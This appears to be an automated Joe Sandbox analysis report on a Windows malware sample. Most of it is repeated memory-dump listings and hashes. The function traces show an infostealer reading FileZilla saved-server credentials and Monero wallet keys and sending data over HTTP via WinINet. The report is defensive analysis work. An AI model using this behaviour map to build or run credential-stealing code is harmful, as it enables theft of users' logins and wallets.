                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: :{Z
                              • API String ID: 0-15389930
                              • Opcode ID: 37da00dceb15a0a4378a3f7c27da0065ff7638a8debb59e508faef0d288fe169
                              • Instruction ID: 3e4290330dd3c3c3463f9c8d45c324813302e467f05e95cff3fc124097a7364f
                              • Opcode Fuzzy Hash: 37da00dceb15a0a4378a3f7c27da0065ff7638a8debb59e508faef0d288fe169
                              • Instruction Fuzzy Hash: 4D4155F3E182204BE3089A68EC597767A95DB54360F1A453CEF89C7384E97A8D0483C6
                              Function 00EF1C47 Relevance: .2, Instructions: 196COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a581e612c30b3d385f4210461d9585c0460c8075fd23deac9d87a0d4ae6465af
                              • Instruction ID: 54df9792d12a8c40f0cab3022bac79439b14c2c0b948df5ba94edbb2b95341e0
                              • Opcode Fuzzy Hash: a581e612c30b3d385f4210461d9585c0460c8075fd23deac9d87a0d4ae6465af
                              • Instruction Fuzzy Hash: C0513BF3A1C3045FF3181E2CEC85766B6D9EB94360F2A023DEA89D77C0E97958014759
                              Function 00EE244F Relevance: .2, Instructions: 193COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ccef3ab412e07a4715e2ededfa295bdd05d581d56fced4898ee6c742d416543a
                              • Instruction ID: 6efdbb9341a3fdcf473772a60eb862731e3edf76b3d73f80687047dae6c1ded9
                              • Opcode Fuzzy Hash: ccef3ab412e07a4715e2ededfa295bdd05d581d56fced4898ee6c742d416543a
                              • Instruction Fuzzy Hash: 7151E6B3A082245BE3546E29DC857BAB7D6DFD4720F2B853DDBC893780E939580486C6
                              Function 00E72128 Relevance: .2, Instructions: 179COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6331a03af9104cb1b88425f346058f5ca125a77050b72ee3993e6ca9e193e56
                              • Instruction ID: a254b1a64da2b467f6a94383ae17137000c610c1f189f1c66f17d29e7388c71a
                              • Opcode Fuzzy Hash: f6331a03af9104cb1b88425f346058f5ca125a77050b72ee3993e6ca9e193e56
                              • Instruction Fuzzy Hash: E45126F3A082109FE3049A2DEC55B6BB6DADBD4730F2B863DEA84D3340D9355C118696
                              Function 00E8EF21 Relevance: .2, Instructions: 168COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 74b1baa0ab4de5bf0e0c657487dfba02ee2fbdc845f6261a3d0caf5ebdeab1da
                              • Instruction ID: 22d09b9452b1c2bf10783807b7f643146f11b42fdb31ca4de20810783b73d52b
                              • Opcode Fuzzy Hash: 74b1baa0ab4de5bf0e0c657487dfba02ee2fbdc845f6261a3d0caf5ebdeab1da
                              • Instruction Fuzzy Hash: E04125F3E091106BE314992EEC4472ABBDBEBD4220F2B853DDA8897340ED765C194296
                              Function 00F5B0A1 Relevance: .1, Instructions: 87COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 85fdddea22f57a54db044977eff50d4be2223033c07810e66a824e5ad1a0e62e
                              • Instruction ID: ec664816b1ed69422281849aa6d23cb24729ed8b754ff8bf77746e707d382d0b
                              • Opcode Fuzzy Hash: 85fdddea22f57a54db044977eff50d4be2223033c07810e66a824e5ad1a0e62e
                              • Instruction Fuzzy Hash: 742108F7A8450D8BF354AA25EC4477B7387E7D0321F1BC639DA9483B88E93E88064245
                              Function 00BF9750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00BF0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                                • Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                                • Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                                • Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                                • Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                                • Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                                • Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00C00DBA,00C00DB7,00C00DB6,00C00DB3), ref: 00BF0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00BF0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00BF03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00BF0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00BF0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00BF0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00BF0571
                              • lstrcat.KERNEL32(?,url: ), ref: 00BF0580
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF0593
                              • lstrcat.KERNEL32(?,00C01678), ref: 00BF05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF05B5
                              • lstrcat.KERNEL32(?,00C0167C), ref: 00BF05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00BF05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF05E6
                              • lstrcat.KERNEL32(?,00C01688), ref: 00BF05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00BF0604
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF0617
                              • lstrcat.KERNEL32(?,00C01698), ref: 00BF0626
                              • lstrcat.KERNEL32(?,00C0169C), ref: 00BF0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 08509a9bda8450c03d0db75fbe155d5e85cc54ba471663a63b42ed4ebf58df9e
                              • Instruction ID: a27f96396f09c909d7a9ef76ca57aa1bbaf04a8637444217d32f06ba0d821ee8
                              • Opcode Fuzzy Hash: 08509a9bda8450c03d0db75fbe155d5e85cc54ba471663a63b42ed4ebf58df9e
                              • Instruction Fuzzy Hash: 10D10EB191010CABCB18EBE4DD56EFEB3B8EF14340F544568F606B7095DA74AA0ECB61
                              Function 00BE5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
                                • Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BE59F8
                              • StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,009BF500,00000000,?,009BE6D8,00000000,?,00C01A1C), ref: 00BE5E71
                              • lstrlen.KERNEL32(00000000), ref: 00BE5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00BE5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BE5E9A
                              • lstrlen.KERNEL32(00000000), ref: 00BE5EAF
                              • lstrlen.KERNEL32(00000000), ref: 00BE5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BE5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00BE5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BE5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BE5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00BE5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00BE5FBD
                              • HttpOpenRequestA.WININET(00000000,009BF4C0,?,009BEC40,00000000,00000000,00400100,00000000), ref: 00BE5BF8
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • InternetCloseHandle.WININET(00000000), ref: 00BE5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 30b211c67be22ab3fa7dd80280d58c669d70b90ff7aee1b233a51439bc347346
                              • Instruction ID: c7367306d200bb6fd75f97bf8232e76f2ccbb2322c5a44cf6f0eb521161c438f
                              • Opcode Fuzzy Hash: 30b211c67be22ab3fa7dd80280d58c669d70b90ff7aee1b233a51439bc347346
                              • Instruction Fuzzy Hash: 8F12CEB182011CABDB19EBA4DC95FEEB3B8BF14740F5441A9B20A73091DF706A4ECB55
                              Function 00BECEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,009BE6A8,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BECF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BED0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BED0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED208
                              • lstrcat.KERNEL32(?,00C01478), ref: 00BED217
